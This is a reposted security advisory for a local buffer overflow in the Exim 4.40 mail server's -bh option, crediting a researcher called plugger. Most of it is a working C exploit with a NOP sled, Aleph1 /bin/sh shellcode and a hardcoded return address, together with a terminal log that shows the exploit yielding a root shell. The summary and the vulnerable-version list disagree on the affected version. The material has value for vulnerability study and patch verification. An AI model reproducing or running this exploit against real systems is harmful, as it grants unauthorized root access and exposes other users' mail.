Exim Buffer Overflow Exploit (Local, dns_build_reverse)Summary
Exim is "a mail transfer agent (MTA) for Unix systems similar to Sendmail". Local exploitation of a buffer overflow vulnerability in Exim 4.41 allows execution of arbitrary commands with elevated privileges. The following exploit code can be used to determine whether your system is vulnerable or not.
Credit:
The information has been provided by plugger.
Details
Vulnerable Systems:
* Exim version 4.40
Example:
plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December 3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!
**** SMTP testing session as if from host
::%A:::::::::::::::::1 FF V
N 1 @ /bin/sh
**** but without any ident (RFC 1413) callback.
**** This is not for real!
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for ::%A:::::::::::::::::1 FF V
N 1 @ /bin/sh
>>> IP address lookup using gethostbyaddr()
>>> IP address lookup failed: h_errno=1
LOG: no host name found for IP address
::%A:::::::::::::::::1 FF V
N 1 @ /bin/sh
sh-2.05b#
sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$
Exploit:
/*
* ripped straight off iDEFENSE advisory - so lazy I just picked
* up GDB... bored on a weeknight :(
*
* nothing to write home to mother about due to the fact that
* you need a local user account on a server and all you
* get is to read other people's emails ....
*
* not even my own shellcode. aleph1 shellcode - cut and paste job
* with nops to pad.
*
* Regards,
* Plugger aka Tony Lockett
*
*
*
*/
char bomb[288]=
/* the gear from iDEFENSE */
"::%A:::::::::::::::::" /* 21 bytes */
/* -------- */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90" /* 218 bytes */
/* --------- */
/* actual code courtesy Aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" /* 12 bytes */
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" /* 12 bytes */
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" /* 9 bytes */
"\xe8\xdc\xff\xff\xff/bin/sh" /* 12 bytes */
/* where EIP should point */
"\xf4\xf2\xff\xbf"; /* 4 bytes */
/* -------- */
/* 49 bytes */
/* -------- */
/* 288 bytes */
/* ========= */
main()
{
char *exim[4];
exim[0] = "/usr/exim/bin/exim";
exim[1] = "-bh";
exim[2] = bomb;
exim[3] = 0x0;
printf("Firing up exim - cross your fingers for shell!\n");
execve(exim[0],exim,0x0);
return;
}
推荐
评论(0条)
